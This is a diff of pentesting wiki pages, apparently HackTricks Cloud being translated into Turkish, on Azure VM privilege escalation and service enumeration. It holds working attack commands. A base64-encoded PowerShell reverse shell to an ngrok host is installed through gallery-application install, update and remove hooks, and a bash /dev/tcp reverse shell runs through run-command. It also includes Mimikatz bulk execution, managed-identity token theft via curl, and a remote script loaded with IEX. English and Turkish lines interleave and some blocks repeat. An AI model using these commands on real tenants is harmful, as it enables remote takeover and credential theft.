export encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
az sig gallery-application version create \
--version-name 1.0.0 \
--application-name myReverseShellAppWin \
--gallery-name myGallery \
--location "West US 2" \
--resource-group <rsc-group> \
--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
--install-command "powershell.exe -EncodedCommand $encodedCommand" \
--remove-command "powershell.exe -EncodedCommand $encodedCommand" \
--update-command "powershell.exe -EncodedCommand $encodedCommand"
--version-name 1.0.0 \
--application-name myReverseShellAppWin \
--gallery-name myGallery \
--location "West US 2" \
--resource-group <rsc-group> \
--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
--install-command "powershell.exe -EncodedCommand $encodedCommand" \
--remove-command "powershell.exe -EncodedCommand $encodedCommand" \
--update-command "powershell.exe -EncodedCommand $encodedCommand"
# Install the app in a VM to execute the rev shell
## Use the ID given in the previous output
az vm application set \
--resource-group <rsc-group> \
--name deleteme-win4 \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \
--treat-deployment-as-failure true
--resource-group <rsc-group> \
--name deleteme-win4 \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \
--treat-deployment-as-failure true
```
{{#endtab }}
{{#endtabs }}
### `Microsoft.Compute/virtualMachines/runCommand/action`
This is the most basic mechanism Azure provides to **execute arbitrary commands in VMs:**
Bu, Azure'ın **VM'lerde rastgele komutlar çalıştırmak için sağladığı en temel mekanizmadır:**
{{#tabs }}
{{#tab name="Linux" }}
```bash
# Execute rev shell
az vm run-command invoke \
--resource-group <rsc-group> \
--name <vm-name> \
--command-id RunShellScript \
--scripts @revshell.sh
--resource-group <rsc-group> \
--name <vm-name> \
--command-id RunShellScript \
--scripts @revshell.sh
# revshell.sh file content
echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh
```
{{#endtab }}
{{#tab name="Windows" }}
```bash
# The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action
# Execute a rev shell
az vm run-command invoke \
--resource-group Research \
--name juastavm \
--command-id RunPowerShellScript \
--scripts @revshell.ps1
--resource-group Research \
--name juastavm \
--command-id RunPowerShellScript \
--scripts @revshell.ps1
## Get encoded reverse shell
echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
@@ -314,62 +293,57 @@ echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1
Import-module MicroBurst.psm1
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
```
{{#endtab }}
{{#endtabs }}
### `Microsoft.Compute/virtualMachines/login/action`
This permission allows a user to **login as user into a VM via SSH or RDP** (as long as Entra ID authentication is enabled in the VM).
Bu izin, bir kullanıcının **VM'ye SSH veya RDP üzerinden kullanıcı olarak giriş yapmasına** olanak tanır (VM'de Entra ID kimlik doğrulaması etkinleştirildiği sürece).
Login via **SSH** with **`az ssh vm --name <vm-name> --resource-group <rsc-group>`** and via **RDP** with your **regular Azure credentials**.
**SSH** ile **`az ssh vm --name <vm-name> --resource-group <rsc-group>`** ve **RDP** ile **normal Azure kimlik bilgilerinizi** kullanarak giriş yapın.
### `Microsoft.Compute/virtualMachines/loginAsAdmin/action`
This permission allows a user to **login as user into a VM via SSH or RDP** (as long as Entra ID authentication is enabled in the VM).
Bu izin, bir kullanıcının **VM'ye SSH veya RDP üzerinden kullanıcı olarak giriş yapmasına** olanak tanır (VM'de Entra ID kimlik doğrulaması etkinleştirildiği sürece).
Login via **SSH** with **`az ssh vm --name <vm-name> --resource-group <rsc-group>`** and via **RDP** with your **regular Azure credentials**.
**SSH** ile **`az ssh vm --name <vm-name> --resource-group <rsc-group>`** ve **RDP** ile **normal Azure kimlik bilgilerinizi** kullanarak giriş yapın.
## `Microsoft.Resources/deployments/write`, `Microsoft.Network/virtualNetworks/write`, `Microsoft.Network/networkSecurityGroups/write`, `Microsoft.Network/networkSecurityGroups/join/action`, `Microsoft.Network/publicIPAddresses/write`, `Microsoft.Network/publicIPAddresses/join/action`, `Microsoft.Network/networkInterfaces/write`, `Microsoft.Compute/virtualMachines/write, Microsoft.Network/virtualNetworks/subnets/join/action`, `Microsoft.Network/networkInterfaces/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
All those are the necessary permissions to **create a VM with a specific managed identity** and leaving a **port open** (22 in this case). This allows a user to create a VM and connect to it and **steal managed identity tokens** to escalate privileges to it.
Depending on the situation more or less permissions might be needed to abuse this technique.
Bunlar, **belirli bir yönetilen kimlik ile bir VM oluşturmak** ve **bir portu açık bırakmak** (bu durumda 22) için gerekli izinlerdir. Bu, bir kullanıcının bir VM oluşturmasına ve ona bağlanmasına ve **yönetilen kimlik jetonlarını çalarak** yetkileri artırmasına olanak tanır.
Duruma bağlı olarak, bu tekniği kötüye kullanmak için daha fazla veya daha az izin gerekebilir.
```bash
az vm create \
--resource-group Resource_Group_1 \
--name cli_vm \
--image Ubuntu2204 \
--admin-username azureuser \
--generate-ssh-keys \
--assign-identity /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourcegroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity \
--nsg-rule ssh \
--location "centralus"
--resource-group Resource_Group_1 \
--name cli_vm \
--image Ubuntu2204 \
--admin-username azureuser \
--generate-ssh-keys \
--assign-identity /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourcegroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity \
--nsg-rule ssh \
--location "centralus"
# By default pub key from ~/.ssh is used (if none, it's generated there)
```
### `Microsoft.Compute/virtualMachines/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
Those permissions are enough to **assign new managed identities to a VM**. Note that a VM can have several managed identities. It can have the **system assigned one**, and **many user managed identities**.\
Then, from the metadata service it's possible to generate tokens for each one.
Bu izinler, bir VM'ye **yeni yönetilen kimlikler atamak için** yeterlidir. Bir VM'nin birden fazla yönetilen kimliği olabileceğini unutmayın. **Sistem atanan bir kimliği** ve **birçok kullanıcı yönetilen kimliği** olabilir.\
Daha sonra, metadata hizmetinden her biri için token'lar oluşturmak mümkündür.
```bash
# Get currently assigned managed identities to the VM
az vm identity show \
--resource-group <rsc-group> \
--name <vm-name>
--resource-group <rsc-group> \
--name <vm-name>
# Assign several managed identities to a VM
az vm identity assign \
--resource-group <rsc-group> \
--name <vm-name> \
--identities \
/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \
/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2
--resource-group <rsc-group> \
--name <vm-name> \
--identities \
/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \
/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2
```
Then the attacker needs to have **compromised somehow the VM** to steal tokens from the assigned managed identities. Check **more info in**:
Sonra saldırganın **VM'yi bir şekilde ele geçirmiş olması gerekiyor** atanan yönetilen kimliklerden token çalmak için. **daha fazla bilgi için kontrol edin**:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm
@@ -377,10 +351,6 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou
### TODO: Microsoft.Compute/virtualMachines/WACloginAsAdmin/action
According to the [**docs**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute), this permission lets you manage the OS of your resource via Windows Admin Center as an administrator. So it looks like this gives access to the WAC to control the VMs...
[**belgelere**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute) göre, bu izin, kaynağınızın işletim sistemini Windows Admin Center aracılığıyla bir yönetici olarak yönetmenizi sağlar. Bu, VM'leri kontrol etmek için WAC'ye erişim sağlıyormuş gibi görünüyor...
{{#include ../../../banners/hacktricks-training.md}}

52
src/pentesting-cloud/azure-security/az-services/README.md
View File

@@ -2,28 +2,27 @@
{{#include ../../../banners/hacktricks-training.md}}
## Portals
## Portallar
You can find the list of **Microsoft portals in** [**https://msportals.io/**](https://msportals.io/)
**Microsoft portallarının listesini** [**https://msportals.io/**](https://msportals.io/) adresinde bulabilirsiniz.
### Raw requests
### Ham istekler
#### Azure API via Powershell
#### Azure API üzerinden Powershell
Get **access_token** from **IDENTITY_HEADER** and **IDENTITY_ENDPOINT**: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`.
Then query the Azure REST API to get the **subscription ID** and more .
**IDENTITY_HEADER** ve **IDENTITY_ENDPOINT**'ten **access_token** alın: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`.
Ardından **subscription ID** ve daha fazlasını almak için Azure REST API'sini sorgulayın.
```powershell
$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
# $URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
@@ -31,9 +30,7 @@ $RequestParams = @{
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/<RG-NAME>/providers/Microsoft.Compute/virtualMachines/<RESOURCE/providers/Microsoft.Authorization/permissions?apiversion=2015-07-01'
```
#### Azure API via Python Version
#### Azure API Python Versiyonu
```python
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
@@ -50,28 +47,21 @@ val = os.popen(cmd).read()
print(json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])
```
or inside a Python Function:
veya bir Python Fonksiyonu içinde:
```python
import logging, os
import azure.functions as func
def main(req: func.HttpRequest) -> func.HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
return func.HttpResponse(val, status_code=200)
logging.info('Python HTTP trigger function processed a request.')
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
return func.HttpResponse(val, status_code=200)
```
## Hizmetler Listesi
## List of Services
**The pages of this section are ordered by Azure service. In there you will be able to find information about the service (how it works and capabilities) and also how to enumerate each service.**
**Bu bölümün sayfaları Azure hizmetine göre sıralanmıştır. Burada hizmet hakkında bilgi bulabileceksiniz (nasıl çalıştığı ve yetenekleri) ve ayrıca her hizmeti nasıl sayacağınızı da öğrenebileceksiniz.**
{{#include ../../../banners/hacktricks-training.md}}

22
src/pentesting-cloud/azure-security/az-services/az-acr.md
View File

@@ -2,14 +2,13 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
Azure Container Registry (ACR) is a managed service provided by Microsoft Azure for **storing and managing Docker container images and other artifacts**. It offers features such as integrated developer tools, geo-replication, security measures like role-based access control and image scanning, automated builds, webhooks and triggers, and network isolation. It works with popular tools like Docker CLI and Kubernetes, and integrates well with other Azure services.
Azure Container Registry (ACR), **Docker konteyner görüntülerini ve diğer varlıkları depolamak ve yönetmek için** Microsoft Azure tarafından sağlanan bir yönetilen hizmettir. Entegre geliştirici araçları, coğrafi çoğaltma, rol tabanlı erişim kontrolü ve görüntü taraması gibi güvenlik önlemleri, otomatik derlemeler, web kancaları ve tetikleyiciler ile ağ izolasyonu gibi özellikler sunar. Docker CLI ve Kubernetes gibi popüler araçlarla çalışır ve diğer Azure hizmetleriyle iyi bir şekilde entegre olur.
### Enumerate
To enumerate the service you could use the script [**Get-AzACR.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Get-AzACR.ps1):
### Sayım
Hizmeti saymak için [**Get-AzACR.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Get-AzACR.ps1) betiğini kullanabilirsiniz:
```bash
# List Docker images inside the registry
IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Get-AzACR.ps1")
@@ -18,19 +17,15 @@ Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name "
Get-AzACR -username <username> -password <password> -registry <corp-name>.azurecr.io
```
{{#tabs }}
{{#tab name="az cli" }}
```bash
az acr list --output table
az acr show --name MyRegistry --resource-group MyResourceGroup
```
{{#endtab }}
{{#tab name="Az Powershell" }}
```powershell
# List all ACRs in your subscription
Get-AzContainerRegistry
@@ -38,19 +33,12 @@ Get-AzContainerRegistry
# Get a specific ACR
Get-AzContainerRegistry -ResourceGroupName "MyResourceGroup" -Name "MyRegistry"
```
{{#endtab }}
{{#endtabs }}
Login & Pull from the registry
Kayıt defterine giriş yapın ve çekin
```bash
docker login <corp-name>.azurecr.io --username <username> --password <password>
docker pull <corp-name>.azurecr.io/<image>:<tag>
```
{{#include ../../../banners/hacktricks-training.md}}

72
src/pentesting-cloud/azure-security/az-services/az-app-service.md
View File

@@ -1,43 +1,42 @@
# Az - App Services
# Az - Uygulama Hizmetleri
{{#include ../../../banners/hacktricks-training.md}}
## App Service Basic Information
## Uygulama Hizmeti Temel Bilgileri
Azure App Services enables developers to **build, deploy, and scale web applications, mobile app backends, and APIs seamlessly**. It supports multiple programming languages and integrates with various Azure tools and services for enhanced functionality and management.
Azure Uygulama Hizmetleri, geliştiricilerin **web uygulamaları, mobil uygulama arka uçları ve API'leri sorunsuz bir şekilde oluşturmasını, dağıtmasını ve ölçeklendirmesini** sağlar. Birden fazla programlama dilini destekler ve geliştirilmiş işlevsellik ve yönetim için çeşitli Azure araçları ve hizmetleri ile entegre olur.
Each app runs inside a sandbox but isolation depends upon App Service plans
Her uygulama bir sandbox içinde çalışır, ancak izolasyon Uygulama Hizmeti planlarına bağlıdır.
- Apps in Free and Shared tiers run on shared VMs
- Apps in Standard and Premium tiers run on dedicated VMs
- Ücretsiz ve Paylaşılan katmanlardaki uygulamalar paylaşılan VM'lerde çalışır.
- Standart ve Premium katmanlardaki uygulamalar özel VM'lerde çalışır.
> [!WARNING]
> Note that **none** of those isolations **prevents** other common **web vulnerabilities** (such as file upload, or injections). And if a **management identity** is used, it could be able to **esalate privileges to them**.
> **Hiçbir** izolasyonun **diğer yaygın** **web güvenlik açıklarını** (örneğin dosya yükleme veya enjeksiyonlar gibi) **önlemediğini** unutmayın. Ve eğer bir **yönetim kimliği** kullanılıyorsa, bu kimlik **yetkileri artırma** yeteneğine sahip olabilir.
### Azure Function Apps
### Azure Fonksiyon Uygulamaları
Basically **Azure Function apps are a subset of Azure App Service** in the web and if you go to the web console and list all the app services or execute `az webapp list` in az cli you will be able to **see the Function apps also listed here**.
Temelde **Azure Fonksiyon uygulamaları, Azure Uygulama Hizmetleri'nin bir alt kümesidir** ve web konsoluna gidip tüm uygulama hizmetlerini listelediğinizde veya az cli'de `az webapp list` komutunu çalıştırdığınızda **Fonksiyon uygulamalarının da burada listelendiğini göreceksiniz**.
Actually some of the **security related features** App services use (`webapp` in the az cli), are **also used by Function apps**.
Aslında, Uygulama hizmetlerinin kullandığı bazı **güvenlik ile ilgili özellikler** (`webapp` az cli'de), **Fonksiyon uygulamaları tarafından da kullanılmaktadır**.
## Basic Authentication
## Temel Kimlik Doğrulama
When creating a web app (and a Azure function usually) it's possible to indicate if you want Basic Authentication to be enabled. This basically **enables SCM and FTP** for the application so it'll be possible to deploy the application using those technologies.\
Moreover in order to connect to them, Azure provides an **API that allows to get the username, password and URL** to connect to the SCM and FTP servers.
Bir web uygulaması (ve genellikle bir Azure fonksiyonu) oluştururken, Temel Kimlik Doğrulama'nın etkinleştirilip etkinleştirilmeyeceğini belirtmek mümkündür. Bu, temelde **SCM ve FTP'yi** uygulama için etkinleştirir, böylece bu teknolojileri kullanarak uygulamayı dağıtmak mümkün olacaktır.\
Ayrıca, onlara bağlanmak için Azure, **SCM ve FTP sunucularına bağlanmak için kullanıcı adı, şifre ve URL'yi almayı sağlayan bir API** sunar.
- Authentication: az webapp auth show --name lol --resource-group lol_group
- Kimlik Doğrulama: az webapp auth show --name lol --resource-group lol_group
SSH
Always On
Her Zaman Açık
Debugging
Hata Ayıklama
### Enumeration
### Sayım
{{#tabs }}
{{#tab name="az" }}
```bash
# List webapps
az webapp list
@@ -101,15 +100,15 @@ az functionapp show --name <app-name> --resource-group <res-group>
# Get details about the source of the function code
az functionapp deployment source show \
--name <app-name> \
--resource-group <res-group>
--name <app-name> \
--resource-group <res-group>
## If error like "This is currently not supported."
## Then, this is probalby using a container
# Get more info if a container is being used
az functionapp config container show \
--name <name> \
--resource-group <res-group>
--name <name> \
--resource-group <res-group>
# Get settings (and privesc to the sorage account)
az functionapp config appsettings list --name <app-name> --resource-group <res-group>
@@ -125,7 +124,7 @@ az functionapp config access-restriction show --name <app-name> --resource-group
# Get more info about a function (invoke_url_template is the URL to invoke and script_href allows to see the code)
az rest --method GET \
--url "https://management.azure.com/subscriptions/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions?api-version=2024-04-01"
--url "https://management.azure.com/subscriptions/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions?api-version=2024-04-01"
# Get source code with Master Key of the function
curl "<script_href>?code=<master-key>"
@@ -135,22 +134,18 @@ curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/func
# Get source code
az rest --url "https://management.azure.com/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
```
{{#endtab }}
{{#tab name="Az Powershell" }}
```powershell
# Get App Services and Function Apps
Get-AzWebApp
# Get only App Services
Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
```
{{#endtab }}
{{#tab name="az get all" }}
```bash
#!/bin/bash
@@ -170,21 +165,19 @@ list_app_services=$(az appservice list --query "[].{appServiceName: name, group:
# Iterate over each App Service
echo "$list_app_services" | while IFS=$'\t' read -r appServiceName group; do
# Get the type of the App Service
service_type=$(az appservice show --name $appServiceName --resource-group $group --query "kind" -o tsv)
# Get the type of the App Service
service_type=$(az appservice show --name $appServiceName --resource-group $group --query "kind" -o tsv)
# Check if it is a Function App and print its name
if [ "$service_type" == "functionapp" ]; then
echo "Function App Name: $appServiceName"
fi
# Check if it is a Function App and print its name
if [ "$service_type" == "functionapp" ]; then
echo "Function App Name: $appServiceName"
fi
done
```
{{#endtab }}
{{#endtabs }}
#### Obtain credentials & get access to the webapp code
#### Kimlik bilgilerini elde et ve web uygulaması koduna erişim sağla
```bash
# Get connection strings that could contain credentials (with DBs for example)
az webapp config connection-string list --name <name> --resource-group <res-group>
@@ -202,17 +195,12 @@ git clone 'https://<username>:<password>@name.scm.azurewebsites.net/repo-name.gi
## In my case the username was: $nameofthewebapp and the password some random chars
## If you change the code and do a push, the app is automatically redeployed
```
{{#ref}}
../az-privilege-escalation/az-app-services-privesc.md
{{#endref}}
## References
## Referanslar
- [https://learn.microsoft.com/en-in/azure/app-service/overview](https://learn.microsoft.com/en-in/azure/app-service/overview)
{{#include ../../../banners/hacktricks-training.md}}

30
src/pentesting-cloud/azure-security/az-services/az-application-proxy.md
View File

@@ -2,25 +2,24 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
[From the docs:](https://learn.microsoft.com/en-us/entra/identity/app-proxy/application-proxy)
[Belgelerden:](https://learn.microsoft.com/en-us/entra/identity/app-proxy/application-proxy)
Azure Active Directory's Application Proxy provides **secure remote access to on-premises web applications**. After a **single sign-on to Azure AD**, users can access both **cloud** and **on-premises applications** through an **external URL** or an internal application portal.
Azure Active Directory'nin Uygulama Proxy'si **yerel web uygulamalarına güvenli uzaktan erişim** sağlar. **Azure AD'ye tek oturum açma** işleminden sonra, kullanıcılar hem **bulut** hem de **yerel uygulamalara** bir **harici URL** veya bir iç uygulama portalı aracılığıyla erişebilir.
It works like this:
Şöyle çalışır:
<figure><img src="../../../images/image (186).png" alt=""><figcaption></figcaption></figure>
1. After the user has accessed the application through an endpoint, the user is directed to the **Azure AD sign-in page**.
2. After a **successful sign-in**, Azure AD sends a **token** to the user's client device.
3. The client sends the token to the **Application Proxy service**, which retrieves the user principal name (UPN) and security principal name (SPN) from the token. **Application Proxy then sends the request to the Application Proxy connector**.
4. If you have configured single sign-on, the connector performs any **additional authentication** required on behalf of the user.
5. The connector sends the request to the **on-premises application**.
6. The **response** is sent through the connector and Application Proxy service **to the user**.
## Enumeration
1. Kullanıcı bir uç nokta aracılığıyla uygulamaya eriştikten sonra, kullanıcı **Azure AD oturum açma sayfasına** yönlendirilir.
2. **Başarılı bir oturum açma** işleminden sonra, Azure AD kullanıcının istemci cihazına bir **token** gönderir.
3. İstemci, token'ı **Uygulama Proxy hizmetine** gönderir; bu hizmet token'dan kullanıcı ilke adını (UPN) ve güvenlik ilke adını (SPN) alır. **Uygulama Proxy daha sonra isteği Uygulama Proxy konektörüne gönderir**.
4. Tek oturum açma yapılandırdıysanız, konektör kullanıcının adına gerekli olan herhangi bir **ek kimlik doğrulama** işlemini gerçekleştirir.
5. Konektör isteği **yerel uygulamaya** gönderir.
6. **Yanıt**, konektör ve Uygulama Proxy hizmeti aracılığıyla **kullanıcıya** gönderilir.
## Sayım
```powershell
# Enumerate applications with application proxy configured
Get-AzureADApplication | %{try{Get-AzureADApplicationProxyApplication -ObjectId $_.ObjectID;$_.DisplayName;$_.ObjectID}catch{}}
@@ -32,13 +31,8 @@ Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Name"}
# to find users and groups assigned to the application. Pass the ObjectID of the Service Principal to it
Get-ApplicationProxyAssignedUsersAndGroups -ObjectId <object-id>
```
## References
## Referanslar
- [https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy](https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy)
{{#include ../../../banners/hacktricks-training.md}}

20
src/pentesting-cloud/azure-security/az-services/az-arm-templates.md
View File

@@ -2,18 +2,17 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
[From the docs:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) To implement **infrastructure as code for your Azure solutions**, use Azure Resource Manager templates (ARM templates). The template is a JavaScript Object Notation (**JSON**) file that **defines** the **infrastructure** and configuration for your project. The template uses declarative syntax, which lets you state what you intend to deploy without having to write the sequence of programming commands to create it. In the template, you specify the resources to deploy and the properties for those resources.
[Belgelerden:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) **Azure çözümleriniz için kod olarak altyapı** uygulamak için Azure Resource Manager şablonlarını (ARM şablonları) kullanın. Şablon, projeniz için **altyapıyı** ve yapılandırmayı **tanımlayan** bir JavaScript Nesne Notasyonu (**JSON**) dosyasıdır. Şablon, neyi dağıtmayı planladığınızı belirtmenizi sağlayan deklaratif bir sözdizimi kullanır; böylece bunu oluşturmak için programlama komutlarının sırasını yazmanıza gerek kalmaz. Şablonda, dağıtılacak kaynakları ve bu kaynakların özelliklerini belirtirsiniz.
### History
### Tarihçe
If you can access it, you can have **info about resources** that are not present but might be deployed in the future. Moreover, if a **parameter** containing **sensitive info** was marked as "**String**" **instead** of "**SecureString**", it will be present in **clear-text**.
Erişim sağlayabiliyorsanız, gelecekte dağıtılabilecek ancak mevcut olmayan **kaynaklar hakkında bilgi** alabilirsiniz. Ayrıca, **hassas bilgi** içeren bir **parametre** "**SecureString**" yerine "**String**" olarak işaretlenmişse, bu **düz metin** olarak mevcut olacaktır.
## Search Sensitive Info
Users with the permissions `Microsoft.Resources/deployments/read` and `Microsoft.Resources/subscriptions/resourceGroups/read` can **read the deployment history**.
## Hassas Bilgileri Ara
`Microsoft.Resources/deployments/read` ve `Microsoft.Resources/subscriptions/resourceGroups/read` izinlerine sahip kullanıcılar **dağıtım geçmişini okuyabilir**.
```powershell
Get-AzResourceGroup
Get-AzResourceGroupDeployment -ResourceGroupName <name>
@@ -23,13 +22,8 @@ Save-AzResourceGroupDeploymentTemplate -ResourceGroupName <RESOURCE GROUP> -Depl
cat <DEPLOYMENT NAME>.json # search for hardcoded password
cat <PATH TO .json FILE> | Select-String password
```
## References
## Referanslar
- [https://app.gitbook.com/s/5uvPQhxNCPYYTqpRwsuS/\~/changes/argKsv1NUBY9l4Pd28TU/pentesting-cloud/azure-security/az-services/az-arm-templates#references](az-arm-templates.md#references)
{{#include ../../../banners/hacktricks-training.md}}

112
src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md
View File

@@ -2,54 +2,53 @@
{{#include ../../../../banners/hacktricks-training.md}}
## Basic Information
## Temel Bilgiler
